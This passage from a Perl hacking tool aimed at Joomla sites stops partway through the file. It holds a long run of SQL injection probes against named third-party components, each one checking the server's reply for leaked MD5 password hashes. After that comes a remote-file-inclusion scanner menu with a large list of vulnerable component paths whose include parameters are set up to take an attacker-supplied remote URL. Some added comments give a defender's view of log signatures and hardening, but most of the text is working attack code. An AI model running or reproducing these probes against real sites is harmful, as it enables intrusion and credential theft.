  786. $host = $target . "/index.php?option=com_markt&page=show_category&catid=999 .$com_markt.";
  787. $res = $b->request(HTTP::Request->new(GET=>$host));
  788. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  789. print "[*] Results : CHECK : \n";
  790. print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
  791. }
  792. else{print "\n[-] Error\n";
  793. }
  794.  
  795. $host = $target . "/index.php?option=com_sponsorwall&controller=sponsorwall&catid=9999 .$com_sponsorwall.";
  796. $res = $b->request(HTTP::Request->new(GET=>$host));
  797. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  798. print "[*] Results : CHECK : \n";
  799. print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
  800. }
  801. else{print "\n[-] Error\n";
  802. }
  803.  
  804. $host = $target . "/index.php?option=com_flipwall&controller=flipwall&catid=999 .$com_flipwall.";
  805. $res = $b->request(HTTP::Request->new(GET=>$host));
  806. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  807. print "[*] Results : CHECK : \n";
  808. print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
  809. }
  810. else{print "\n[-] Error\n";
  811. }
  812.  
  813. $host = $target . "/index.php?option=com_jedirectory&view=item&catid=999 .$jedirectory.";
  814. $res = $b->request(HTTP::Request->new(GET=>$host));
  815. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  816. print "[*] Results : CHECK : \n";
  817. print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
  818. }
  819. else{print "\n[-] Error\n";
  820. }
  821.  
  822. $host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task=helpers&firstCode=999 .$com_ezautos.";
  823. $res = $b->request(HTTP::Request->new(GET=>$host));
  824. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  825. print "[*] Results : CHECK : \n";
  826. print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
  827. }
  828. else{print "\n[-] Error\n";
  829. }
  830.  
  831. $host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
  832. $res = $b->request(HTTP::Request->new(GET=>$host));
  833. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  834. print "[*] Results : CHECK : \n";
  835. print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
  836. }
  837. else{print "\n[-] Error\n";
  838. }
  839.  
  840. $host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
  841. $res = $b->request(HTTP::Request->new(GET=>$host));
  842. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  843. print "[*] Results : CHECK : \n";
  844. print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
  845. }
  846. else{print "\n[-] Error\n";
  847. }
  848.  
  849. $host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
  850. $res = $b->request(HTTP::Request->new(GET=>$host));
  851. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  852. print "[*] Results : CHECK : \n";
  853. print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
  854. }
  855. else{print "\n[-] Error\n";
  856. }
  857.  
  858. $host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
  859. $res = $b->request(HTTP::Request->new(GET=>$host));
  860. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  861. print "[*] Results : CHECK : \n";
  862. print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
  863. }
  864. else{print "\n[-] Error\n";
  865. }
  866.  
  867. $host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
  868. $res = $b->request(HTTP::Request->new(GET=>$host));
  869. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  870. print "[*] Results : CHECK : \n";
  871. print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
  872. }
  873. else{print "\n[-] Error\n";
  874. }
  875.  
  876. $host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=-999 .$com_simpleshop.";
  877. $res = $b->request(HTTP::Request->new(GET=>$host));
  878. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  879. print "[*] Results : CHECK : \n";
  880. print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
  881. }
  882. else{print "\n[-] Error\n";
  883. }
  884.  
  885. $host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
  886. $res = $b->request(HTTP::Request->new(GET=>$host));
  887. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  888. print "[*] Results : CHECK : \n";
  889. print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
  890. }
  891. else{print "\n[-] Error\n";
  892. }
  893.  
  894. $host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=.$com_joomdle.";
  895. $res = $b->request(HTTP::Request->new(GET=>$host));
  896. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  897. print "[*] Results : CHECK : \n";
  898. print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
  899. }
  900. else{print "\n[-] Error\n";
  901. }
  902.  
  903. $host = $target . "/index.php?option=com_itarmory&view=guildmembers&Itemid=.$com_itarmory.";
  904. $res = $b->request(HTTP::Request->new(GET=>$host));
  905. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  906. print "[*] Results : CHECK : \n";
  907. print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
  908. }
  909. else{print "\n[-] Error\n";
  910. }
  911.  
  912. $host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999 .$com_iproperty.";
  913. $res = $b->request(HTTP::Request->new(GET=>$host));
  914. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  915. print "[*] Results : CHECK : \n";
  916. print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
  917. }
  918. else{print "\n[-] Error\n";
  919. }
  920.  
  921. $host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
  922. $res = $b->request(HTTP::Request->new(GET=>$host));
  923. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  924. print "[*] Results : CHECK : \n";
  925. print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
  926. }
  927. else{print "\n[-] Error\n";
  928. }
  929.  
  930. $host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
  931. $res = $b->request(HTTP::Request->new(GET=>$host));
  932. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  933. print "[*] Results : CHECK : \n";
  934. print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
  935. }
  936. else{print "\n[-] Error\n";
  937. }
  938.  
  939. $host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
  940. $res = $b->request(HTTP::Request->new(GET=>$host));
  941. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  942. print "[*] Results : CHECK : \n";
  943. print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
  944. }
  945. else{print "\n[-] Error\n";
  946. }
  947.  
  948. $host = $target . "/index.php?option=com_staticxt&staticfile=test.php&id=-999 .$com_staticxt.";
  949. $res = $b->request(HTTP::Request->new(GET=>$host));
  950. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  951. print "[*] Results : CHECK : \n";
  952. print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
  953. }
  954. else{print "\n[-] Error\n";
  955. }
  956.  
  957. $host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
  958. $res = $b->request(HTTP::Request->new(GET=>$host));
  959. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  960. print "[*] Results : CHECK : \n";
  961. print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
  962. }
  963. else{print "\n[-] Error\n";
  964. }
  965.  
  966. $host = $target . "/index.php?option=com_quran&action=viewayat&surano=999 .$com_quran.";
  967. $res = $b->request(HTTP::Request->new(GET=>$host));
  968. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  969. print "[*] Results : CHECK : \n";
  970. print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
  971. }
  972. else{print "\n[-] Error\n";
  973. }
  974.  
  975. $host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
  976. $res = $b->request(HTTP::Request->new(GET=>$host));
  977. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  978. print "[*] Results : CHECK : \n";
  979. print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
  980. }
  981. else{print "\n[-] Error\n";
  982. }
  983.  
  984. $host = $target . "/index.php?option=com_newsfeeds&view=categories&feedid=-999 .$com_newsfeeds.";
  985. $res = $b->request(HTTP::Request->new(GET=>$host));
  986. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  987. print "[*] Results : CHECK : \n";
  988. print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
  989. }
  990. else{print "\n[-] Error\n";
  991. }
  992.  
  993. $host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
  994. $res = $b->request(HTTP::Request->new(GET=>$host));
  995. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  996. print "[*] Results : CHECK : \n";
  997. print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
  998. }
  999. else{print "\n[-] Error\n";
  1000. }
  1001.  
  1002. $host = $target . "/index.php?option=com_abc&view=abc&letter=AS&sectionid=-999 .$com_abc.";
  1003. $res = $b->request(HTTP::Request->new(GET=>$host));
  1004. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1005. print "[*] Results : CHECK : \n";
  1006. print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
  1007. }
  1008. else{print "\n[-] Error\n";
  1009. }
  1010.  
  1011. $host = $target . "/index2.php?option=com_joomradio&page=show_video&id=-999 .$com_joomradio.";
  1012. $res = $b->request(HTTP::Request->new(GET=>$host));
  1013. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1014. print "[*] Results : CHECK : \n";
  1015. print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
  1016. }
  1017. else{print "\n[-] Error\n";
  1018. }
  1019.  
  1020. $host = $target . "/index.php?option=com_jtm&view=search&view=search&author=-999 .$com_jtm.";
  1021. $res = $b->request(HTTP::Request->new(GET=>$host));
  1022. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1023. print "[*] Results : CHECK : \n";
  1024. print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
  1025. }
  1026. else{print "\n[-] Error\n";
  1027. }
  1028.  
  1029. $host = $target . "/index.php?option=com_gbufacebook&task=show_face&face_id=-999 .$com_gbufacebook.";
  1030. $res = $b->request(HTTP::Request->new(GET=>$host));
  1031. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1032. print "[*] Results : CHECK : \n";
  1033. print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
  1034. }
  1035. else{print "\n[-] Error\n";
  1036. }
  1037.  
  1038. $host = $target . "/index.php?option=com_manager&view=flight&Itemid=999 .$com_manager.";
  1039. $res = $b->request(HTTP::Request->new(GET=>$host));
  1040. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1041. print "[*] Results : CHECK : \n";
  1042. print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
  1043. }
  1044. else{print "\n[-] Error\n";
  1045. }
  1046.  
  1047. $host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
  1048. $res = $b->request(HTTP::Request->new(GET=>$host));
  1049. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1050. print "[*] Results : CHECK : \n";
  1051. print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
  1052. }
  1053. else{print "\n[-] Error\n";
  1054. }
  1055.  
  1056. $host = $target . "/index.php?option=com_sermonspeaker&task=latest_sermons&id=-999 .$com_sermonspeaker.";
  1057. $res = $b->request(HTTP::Request->new(GET=>$host));
  1058. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1059. print "[*] Results : CHECK : \n";
  1060. print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
  1061. }
  1062. else{print "\n[-] Error\n";
  1063. }
  1064.  
  1065. $host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetails&id=-999 .$com_jdrugstopics.";
  1066. $res = $b->request(HTTP::Request->new(GET=>$host));
  1067. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1068. print "[*] Results : CHECK : \n";
  1069. print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
  1070. }
  1071. else{print "\n[-] Error\n";
  1072. }
  1073.  
  1074. $host = $target . "/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
  1075. $res = $b->request(HTTP::Request->new(GET=>$host));
  1076. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1077. print "[*] Results : CHECK : \n";
  1078. print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
  1079. }
  1080. else{print "\n[-] Error\n";
  1081. }
  1082.  
  1083. $host = $target . "/index.php?option=com_articles&task=view_addarticles&sid=999 .$com_articles.";
  1084. $res = $b->request(HTTP::Request->new(GET=>$host));
  1085. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1086. print "[*] Results : CHECK : \n";
  1087. print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
  1088. }
  1089. else{print "\n[-] Error\n";
  1090. }
  1091.  
  1092. $host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&catid=999 .$com_dcs_flashgames.";
  1093. $res = $b->request(HTTP::Request->new(GET=>$host));
  1094. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1095. print "[*] Results : CHECK : \n";
  1096. print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
  1097. }
  1098. else{print "\n[-] Error\n";
  1099. }
  1100.  
  1101. $host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
  1102. $res = $b->request(HTTP::Request->new(GET=>$host));
  1103. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1104. print "[*] Results : CHECK : \n";
  1105. print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
  1106. }
  1107. else{print "\n[-] Error\n";
  1108. }
  1109.  
  1110. $host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
  1111. $res = $b->request(HTTP::Request->new(GET=>$host));
  1112. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1113. print "[*] Results : CHECK : \n";
  1114. print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
  1115. }
  1116. else{print "\n[-] Error\n";
  1117. }
  1118.  
  1119. $host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
  1120. $res = $b->request(HTTP::Request->new(GET=>$host));
  1121. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1122. print "[*] Results : CHECK : \n";
  1123. print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
  1124. }
  1125. else{print "\n[-] Error\n";
  1126. }
  1127.  
  1128. $host = $target . "/index.php?option=com_productbook&Itemid=999&func=detail&id=-999 .$com_productbook.";
  1129. $res = $b->request(HTTP::Request->new(GET=>$host));
  1130. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1131. print "[*] Results : CHECK : \n";
  1132. print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
  1133. }
  1134. else{print "\n[-] Error\n";
  1135. }
  1136.  
  1137. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  1138. $res = $b->request(HTTP::Request->new(GET=>$host));
  1139. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1140. print "[*] Results : CHECK : \n";
  1141. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  1142. }
  1143. else{print "\n[-] Error\n";
  1144. }
  1145.  
  1146. $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
  1147. $res = $b->request(HTTP::Request->new(GET=>$host));
  1148. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1149. print "[*] Results : CHECK : \n";
  1150. print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
  1151. }
  1152. else{print "\n[-] Error\n";
  1153. }
  1154.  
  1155. $host = $target . "/index.php?option=com_dms&task=view_category&category_id=-999 .$com_dms.";
  1156. $res = $b->request(HTTP::Request->new(GET=>$host));
  1157. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1158. print "[*] Results : CHECK : \n";
  1159. print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
  1160. }
  1161. else{print "\n[-] Error\n";
  1162. }
  1163.  
  1164. $host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
  1165. $res = $b->request(HTTP::Request->new(GET=>$host));
  1166. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1167. print "[*] Results : CHECK : \n";
  1168. print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
  1169. }
  1170. else{print "\n[-] Error\n";
  1171. }
  1172.  
  1173. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  1174. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  1175. $host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
  1176. $res = $b->request(HTTP::Request->new(GET=>$host));
  1177. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1178. print "[*] Results : CHECK : \n";
  1179. print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
  1180. }
  1181. else{print "\n[-] Error\n";
  1182. }
  1183.  
  1184. $host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
  1185. $res = $b->request(HTTP::Request->new(GET=>$host));
  1186. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1187. print "[*] Results : CHECK : \n";
  1188. print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
  1189. }
  1190. else{print "\n[-] Error\n";
  1191. }
  1192.  
  1193. $host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
  1194. $res = $b->request(HTTP::Request->new(GET=>$host));
  1195. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1196. print "[*] Results : CHECK : \n";
  1197. print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
  1198. }
  1199. else{print "\n[-] Error\n";
  1200. }
  1201.  
  1202. $host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
  1203. $res = $b->request(HTTP::Request->new(GET=>$host));
  1204. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  1205. print "[*] Results : CHECK : \n";
  1206. print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
  1207. }
  1208. else{print "\n[-] Error\n";
  1209. }
  1210.  
  1211. }
  # Menu option '4': remote-file-inclusion (RFI) probe against legacy
  # Joomla/Mambo component and module scripts (per the window title and the
  # mosConfig_* parameter names in the list below).
  #
  # Flow: read a base URL from STDIN, append each entry of @RFI plus one fixed
  # remote URL, fetch the result with get(), and append a verdict line per
  # request to RFI.txt in the current directory.
  #
  # Defender view: in web access logs this shows up as a rapid series of GETs
  # from one client to the paths below, each with an include-path parameter
  # (mosConfig_absolute_path, mosConfig_live_site, GLOBALS[...], basedir, ...)
  # whose value starts with "http://". Requests of that shape are worth
  # alerting on or blocking at the WAF regardless of whether the component is
  # installed. This class of include is typically only reachable when PHP
  # permits URL includes (allow_url_include) and lets request parameters
  # overwrite script variables (register_globals), so both should be off and
  # unused legacy components removed.
  if ($c eq '4') {
      system('cls');
      system('title JOomla Rfi Scanner');

      # Candidate script paths. Every entry ends in "<param>=" so the remote
      # URL can be appended directly as that parameter's value.
      @RFI = (
          "/components/com_flyspray/startdown.php?file=",
          "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
          "/components/com_simpleboard/file_upload.php?sbp=",
          "/components/com_hashcash/server.php?mosConfig_absolute_path=",
          "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
          "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
          "/components/com_performs/performs.php?mosConfig_absolute_path=",
          "/components/com_forum/download.php?phpbb_root_path=",
          "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
          "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
          "/components/minibb/index.php?absolute_path=",
          "/components/com_smf/smf.php?mosConfig_absolute_path=",
          "/modules/mod_calendar.php?absolute_path=",
          "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
          "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
          "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
          "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
          "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
          "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
          "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
          "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
          "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
          "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
          "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
          "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
          "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
          "/akocomments.php?mosConfig_absolute_path=",
          "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
          "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
          "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
          "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
          "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
          "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
          "/components/com_fm/fm.install.php?lm_absolute_path=",
          "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
          "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
          "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
          "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
          "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
          "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
          "/components/com_mambowiki/MamboLogin.php?IP=",
          "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
          "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
          "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
          "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
          "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
          "/components/com_mospray/scripts/admin.php?basedir=",
          "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
          "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
          "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
          "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
          "/components/com_madeira/img.php?url=",
          "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
          "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
          "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
          "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
          "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
          "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
          "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
          "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
          "/index.php?option=com_custompages&cpage=",
          "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
          "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
          "/components/com_facileforms/facileforms.frame.php?ff_compath=",
          "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
          "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
          "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
          "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
          "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
          "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
          "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
          "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
          "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
          "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
          "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
          "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
          "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
          "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
          "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
          "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
          "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
          "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
          "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
          "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
          "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
          "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
          "/components/com_joomlaboard/file_upload.php?sbp=",
          "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
          "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
          "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
          "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
          "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
          "/modules/mod_as_category.php?mosConfig_absolute_path=",
          "/components/com_articles.php?absolute_path=",
          "/classes/html/com_articles.php?absolute_path=",
          "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
          "/templates/be2004-2/index.php?mosConfig_absolute_path=",
          "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
          "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
          "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
          "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
          "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
          "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
          "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
          "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
